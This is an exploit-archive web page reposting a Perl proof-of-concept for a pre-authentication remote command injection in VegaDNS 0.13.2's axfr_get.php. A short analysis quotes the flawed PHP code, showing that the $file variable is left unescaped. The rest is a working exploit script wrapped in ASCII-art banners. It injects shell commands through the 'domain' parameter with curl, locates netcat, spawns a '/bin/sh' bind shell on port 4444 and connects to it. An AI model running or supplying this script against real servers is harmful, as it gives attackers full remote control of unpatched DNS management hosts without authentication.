首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VegaDNS 0.13.2 - Remote Command Injection
来源:justanotherhacker.com 作者:Wireghoul 发布时间:2016-09-21  
#!/usr/bin/perl
                                                                                                                                                                       $izd= qq{
  ██╗███████╗██╗   ██╗███╗   ██╗ █████╗     ██████╗ ██████╗  ██████╗ ██████╗
  ██║╚══███╔╝██║   ██║████╗  ██║██╔══██╗    ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
  ██║  ███╔╝ ██║   ██║██╔██╗ ██║███████║    ██║  ██║██████╔╝██║   ██║██████╔╝
  ██║ ███╔╝  ██║   ██║██║╚██╗██║██╔══██║    ██║  ██║██╔══██╗██║   ██║██╔═══╝
  ██║███████╗╚██████╔╝██║ ╚████║██║  ██║    ██████╔╝██║  ██║╚██████╔╝██║
  ╚═╝╚══════╝ ╚═════╝ ╚═╝  ╚═══╝╚═╝  ╚═╝    ╚═════╝ ╚═╝  ╚═╝ ╚═════╝ ╚═╝
                                                                                                                                                                       };$vg=qq{
         ▀  ▐░░▄                    ▄▄▄▄▄▄▄
     ▀▀  ▄░  ▐▀▄▀▄              ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
 ▀▀▀ ▐▄▄░  ▀▐▄ ▄▀▄ ▄         ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
        ▀ ▄  ▐▀▄  ▀▄░       ▄▄░░      ▀▓▓▓▓▓▓▓▓▓▌
             ▐▀▄▀▄  ▀▀▄▀▄   ▓▌░░     ▄▄▐▓▀▓▓░▀▓▓▓▌
              ▀▄▀▄▀▄░ ▐▀▄▀▄  ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄      ▄▄▄▓▓▓▓▄▄▄
                ▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓       ░░ ▒░░   ▀▀▒▒▒▓▓▒░░░    ░░▒▒▄
                  ▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄      ▒░▒░░      ░░▒░           ░░▓
                    ▐▄ ░░░ ░▒░░▒▌ █▄▒░▄  ▄▓▒░  ▐░░ ░░░▒░             ░░
                   ▓▓░▄▓ ░▒░  ░░▐▓  ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░   ░      ░░░░
                    ▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░   ░░▒▒▒░▒
                         █░░  ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
                     ▐▒▒▒  █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░  ░ ░░▒░░░  ░▒
                 ▓▒░░▐▒░ ░▓  ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░     ░░░░▒▄░░▒░░    ░▒
                ▓▒ ░▒▒▒█ ░▒▓  ▐▒▓░▒▒░  ▐░░ ▀▒▒▒░░░   ░   ▐░░▒▒▒     ░ ░
               █░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░   ░    ░░░░░    ░░▒▒▒    ░   ▒▒
                ▀▓▓▀░▓▌▒░▒  ░▒▓▓▓▒▒▒░░░░         ░    ░░▒▒░  ░      ░░▒
                  ▀▀▓▓▌▀░  ░ ░▐▓▓▓▒▓▓▓▄░░░▄     ▐░░░▒▒▒▀ ▐░▒▄░    ▐░░░▒
                      ▐▒▒░░▄▓▓░▌  ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░   ░░▒▒▒▓
                       ▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
                         ▓▒░░░▄   ░░▒▓▀       ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
                          ▀▓▄▒▒▒░░░▒▓          ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
                             ▀▀▀▀  ▀           ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
                                             ▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░     ▒
                                            ▓▒▒▓▌░░░░░░░▒▌░░░░ ░   ░  ▀  ░▄
                                           ▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀   ░░░   ░░░▒▌
                                          ▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄  ░░░░░▐░
                                      ▄▐█▒  ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀   ▀  ░░▒▌
                                  ▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░   ░    ░  ▒▒█▀
                               ▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌    ░  ▐░ ░  ░▒
                             ▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░   ░   ▐░░░  ░█
                          ▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌   ░   ▐░░░ ░░▒
                      ▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░      ░░░░ ░░▒
                   ▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░      ░░░░  ░░
                  ▄▒░░░░   ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░  ░  ░░░░  ░░▒
                  ▒░░░░░░▒▒▓▓▓▓▓▓▓█    ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░  ░ ░░░░  ▐▒▌
                 ▒▀░░░▒░░▓▒▓▓▓▓▓▌▀     ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░  ░▒▌
                 ▓ ░▒░░░▀▀▒▓▓▓▓▓▌      ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
                ▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌           ▀▓▓▓▓▓▓▓▓▒░  ░░░ ░▄░▒▓▌
                 ░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀                   ▒░      ░ ░░▓▓▄
                 ░        ▓                        ▓▒░       ░░▒▀▒░▒▄
                ▄     ░  ▀                          ▓▒░░▄░░░░░▀░░░▌░░▒
                ░     ▄▄▀                            ▀▒▒▒▒▒▄ ▄░░░░  ▀▀
                     ░░░                              ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
               ░   ░▀░░                               ▀▀▒▒▒▒▀       ▀▒ ▄
         ▄▄▄▄▄▄   ▄▀▒▓▌▄                                   ▀▄        ░ ░
         ▓▓▓▓▌▄  ▄▓▓▓▓▓▓▓                                    ▒ ▄      ░ ▄
         ▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓                                       ░    ▀▓ ▄
         ▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀                                          ░   ▀▄░▒▌▄▄
     ▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀                                            ▄▓▄▄▄▄▄▒▓▓▓▓▄
 ▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█                                               ▐▓████▓▓▓▓▓▓▒▓▓
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█                                                  ▐▓░░░▒▓▓▓▓▒▓▓
                                                                  ▐▓▓░▒▓▓▓▓▓▓▓
                                                                  ▐▓▓▓▓▓▓▒▒▓▌
                                                              ▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
                                                             ██▒░░░░░░░▓▓███
 
                                                                                                                                                                        };$b=qq{
  ██╗   ██╗███████╗ ██████╗  █████╗ ██████╗ ███╗   ██╗███████╗
  ██║   ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗  ██║██╔════╝
  ██║   ██║█████╗  ██║  ███╗███████║██║  ██║██╔██╗ ██║███████╗
  ╚██╗ ██╔╝██╔══╝  ██║   ██║██╔══██║██║  ██║██║╚██╗██║╚════██║
   ╚████╔╝ ███████╗╚██████╔╝██║  ██║██████╔╝██║ ╚████║███████║
    ╚═══╝  ╚══════╝ ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚═╝  ╚═══╝╚══════╝
 
 
  ██████╗ ███████╗███╗   ███╗ ██████╗ ████████╗███████╗
  ██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
  ██████╔╝█████╗  ██╔████╔██║██║   ██║   ██║   █████╗
  ██╔══██╗██╔══╝  ██║╚██╔╝██║██║   ██║   ██║   ██╔══╝
  ██║  ██║███████╗██║ ╚═╝ ██║╚██████╔╝   ██║   ███████╗
  ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝    ╚═╝   ╚══════╝
 
 
  ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗    ██████╗ ██╗   ██╗
  ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝    ██╔══██╗╚██╗ ██╔╝
  █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║       ██████╔╝ ╚████╔╝
  ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║       ██╔══██╗  ╚██╔╝
  ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║       ██████╔╝   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝       ╚═════╝    ╚═╝
 
 
                                         ▄
                                  ▄█▀      ▀█▄▄
                             ▄▄▓▀▀             ▀▓▄▄
                          ▄▓▓▀                    ▀█▓▄
                       ▄▓▓▀                          ▀▓▓▓▄
                    ▄▓▓█▀                               ▀▓▓▄▄
                 ▄▓▓▓▀                                    ▀▓▓▓▄
               ▄▓▓▓▀                                        ▀▓▓▓▓
             ▓▓▓▓▀                                            ▀▓▓▓▓▄
           ▓▓▓▓█                                                ▀▓▓▓▓
          ▐▓▓▓▀                                                   ▓▓▓▌
           ▓▓▓▌                                                  ▐▓▓▓
            ▓▓▓▌                                                ▄▓▓▓
             ▓▓▓▓                                              ▄▓▓▓
              ▓▓▓▓▓▓▓▓▓▓██                            ██▓▓▓▓▓▓▓▓▓▓
               ▀▀▀▀      ▄▄▄▄▄▄▄▄▄▄▄        ▄▄▄▄▄▄▄▄▄▄▄       ▀▀█
                ▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀   ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄
            ▄▓▓▓▓█▀▀▀              ▓▓█    ▐▓▓              ▀▀▀█▓▓▓▓▓
             ▓▓▓                  ▐▓█      ▀▓▌                  ▓▓▓
              █▓▌                 ▓▀    ▌   ▀▓                 ▐▓▓
               ▀▓  ▄          ▄▀ ▐   ▌ ▓▓ ▐▄  █ ▀▓▄         ▄▌ ▓▀
                 █ ▀▓▄     ▄▓█     ▄▓ ▐▓▓▌ █▓     ▀▓▄▄    ▄▓▀ ▓
              ▄▌     █▓▓▓▓▓▀      ▓▓▓▄▓▌▐▓▄▄▓▓      ▀▓▓▓▄▓▓▀    ▐▄
             ▓▓        █▀▀                             ▀█▀       ▀▓
            ▓▓           ▄  ▄▀                     ▄   ▄          ▓▓
           ▓▓▓▄       ▄▓▀ ▄█    ▄              ▄    ▀▄ ▀▓▄        ▓▓▓
          ████▀▀▀▀▀▀▀▀▀  ▓▀  ▄ ▄                ▓ █   ▓  ▀▀▀▀▀▀▀▀▀████
                       ▄▓▀  ▓ ▄▌▐     ▐  ▌     ▌▐▓ ▓   ▓▄
                      ▄▓ ▄▄▓▌▐▓ ▐   ▓ ▓  ▓ ▐▄  ▌ ▓▌▐▓▄▄ ▓▓
                     ▓▓▓█▀▀  ▀█▓▓▌ ▓ ▐▓  █▌ ▓  ▓▓█▀  ▀▀█▓▓▓
                    █▀          ▀ ▐▓▄▓▌  ▐▓▄▓▌ ▀          ▀█
                                     ▀    ▀▀
 
 
         ___ .___ .______  ._______._____  .___.__  ._______  .____     .___
.___    |   |: __|: __   \ : .____/:_ ___\ :   |  \ : .___  \ |    |___ |   |
:   | /\|   || : ||  \____|| : _/\ |   |___|   :   || :   |  ||    |   ||   |
|   |/  :   ||   ||   :  \ |   /  \|   /  ||   .   ||     :  ||    :   ||   |/\
|   /       ||   ||   |___\|_.: __/|. __  ||___|   | \_. ___/ |        ||   /  \
|______/|___||___||___|       :/    :/ |. |    |___|   :/     |. _____/ |______/
        :                           :   :/             :       :/
        :                               :                      :
 
                                                                                                                                                                        };$g=qq{
 
   ██████╗ ██████╗ ███████╗███████╗████████╗███████╗
  ██╔════╝ ██╔══██╗██╔════╝██╔════╝╚══██╔══╝╚══███╔╝
  ██║  ███╗██████╔╝█████╗  █████╗     ██║     ███╔╝
  ██║   ██║██╔══██╗██╔══╝  ██╔══╝     ██║    ███╔╝
  ╚██████╔╝██║  ██║███████╗███████╗   ██║   ███████╗
   ╚═════╝ ╚═╝  ╚═╝╚══════╝╚══════╝   ╚═╝   ╚══════╝
 
To all the people with mad skills who share their knowledge:
 
  TecR0c, mr_me, action_dk, bcoles, TheColonial, jduck, hdmoore, rgod, TESO,
  mdowd, kernelpool, silviocesare, egyp7, w00 w00, felinemenace, corelan,
  lgandx, _sinne3r, alexsotirov, fjserna, solardiz, l0pth, cDc, therealsaumil,
  laughing_mantis, g0tm1k, nmrc, and many many more....
 
                                                                                                                                                                        };$a=qq^
 
   █████╗ ███╗   ██╗ █████╗ ██╗  ██╗   ██╗███████╗██╗███████╗
  ██╔══██╗████╗  ██║██╔══██╗██║  ╚██╗ ██╔╝██╔════╝██║██╔════╝
  ███████║██╔██╗ ██║███████║██║   ╚████╔╝ ███████╗██║███████╗
  ██╔══██║██║╚██╗██║██╔══██║██║    ╚██╔╝  ╚════██║██║╚════██║
  ██║  ██║██║ ╚████║██║  ██║███████╗██║   ███████║██║███████║
  ╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚══════╝╚═╝   ╚══════╝╚═╝╚══════╝l
 
VegaDNS is a tinydns administration tool written in PHP to allow easy
administration of DNS records through a web browser.
-- http://www.vegadns.org
 
 
The file axfr_get.php allows unauthenticated access and fails to correctly
apply input escaping to all variables that is based on user input. This
allows an attacker to inject shell syntax constructs to take control of the
command execution.
 
The following code from axfr_get.php shows how the variable $file becomes
tainted trough the $domain variable which is tainted from direct user input.
The application tries to prevent this by escaping the $domain and $hostname
variables, but fails to escape the $file variable.
 
---------------------------cut---------------------------
 * NOTE:
 *          This functionality ONLY exists outside of the main application
 *          because tcplient kept dying fatally due to file descriptor 7
 *          being unavailable, which only occurs AFTER session_start() is
 *          called.
 *
 */
require_once 'src/config.php';
// CHECKS
// Make sure the hostname was given
if(!isset($_REQUEST['hostname']) || $_REQUEST['hostname'] == "") {
    echo "ERROR: no hostname given\n";
    exit;
}
// Make sure that some domains were given
if(!isset($_REQUEST['domain']) || $_REQUEST['domain'] == "") {
    echo "ERROR: no domain was supplied\n";
    exit;
}
$domain = $_REQUEST['domain'];
$hostname = $_REQUEST['hostname'];
$rand = rand();
$file = "/tmp/$domain.$rand";
$command = "$dns_tools_dir/tcpclient -R '".escapeshellcmd($hostname)."' 53 $dns_tools_dir/axfr-get '".escapeshellcmd($domain)."' $file $file.tmp 2>&1";
exec($command, $out);
---------------------------end---------------------------
 
  ███████╗██╗  ██╗██████╗ ██╗      ██████╗ ██╗████████╗
  ██╔════╝╚██╗██╔╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
  █████╗   ╚███╔╝ ██████╔╝██║     ██║   ██║██║   ██║
  ██╔══╝   ██╔██╗ ██╔═══╝ ██║     ██║   ██║██║   ██║
  ███████╗██╔╝ ██╗██║     ███████╗╚██████╔╝██║   ██║
  ╚══════╝╚═╝  ╚═╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝
                                                                                                                                                                              ^;
 
print "$izd\n"." " x 17 . "VegaDNS pre-auth RCE exploit by \@Wireghoul\n";
print "  "."=" x 50 ."[justanotherhacker.com]==\n";
&usage if ($ARGV[0] !~ m!.+://([^/:]+)!);
$h=$1;
print "  . . . Locating netcat\n";
$cmd='which+nc';
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -s -k '$t'`;
if ($z !~ m{/nc}) {
    print "  ! ! ! netcat not found! Manual exploitation required:\n";
    print "        $ARGV[0]/axfr_get?hostname=izunadrop&domain=%3bCMD%3b\n";
    exit 1;
}
print "  . . . netcat found: $z\n";
print "  . . . Performing IZUNA DROP!\n";
#  ← · ↑ · → · ↓ · <img draggable="false" class="emoji" alt="↖" src="https://s.w.org/images/core/emoji/2/svg/2196.svg"> · <img draggable="false" class="emoji" alt="↗" src="https://s.w.org/images/core/emoji/2/svg/2197.svg"> · <img draggable="false" class="emoji" alt="↘" src="https://s.w.org/images/core/emoji/2/svg/2198.svg"> · <img draggable="false" class="emoji" alt="↙" src="https://s.w.org/images/core/emoji/2/svg/2199.svg">
print "      ↓ ↓ ↑ *k* → → *p*\n";
$cmd="$z+-e+/bin/sh+-lp+4444";
$t=$ARGV[0]."/axfr_get?hostname=izunadrop&domain=%3b$cmd%3bagev";
$z=`curl -m 3 -s -k '$t &'`;
print $vg."\n";
print "  . . . K.O ! ! ! Connecting to bindshell on $h port 4444\n";
system("nc -v $h 4444");
sub usage { print "Usage $0 http://host/path/to/vegadns\n\n$ARGV[0]"; exit;
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dolphin 7.3.0 - Error-Based SQ
·DllHijackAuditor 3.5 - Stack O
·ZineBasic 1.1 - Arbitrary File
·Kaltura 11.1.0-2 - Remote Code
·EKG Gadu 1.9~pre+r2855-3+b1 -
·Microsoft Internet Explorer 11
·PHP 5.0.0 - 'tidy_parse_file()
·Kerberos in Microsoft Windows
·Docker Daemon Privilege Escala
·Metasploit Web UI - Diagnostic
·AnoBBS 1.0.1 - Remote File Inc
·Metasploit Web UI Static secre
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved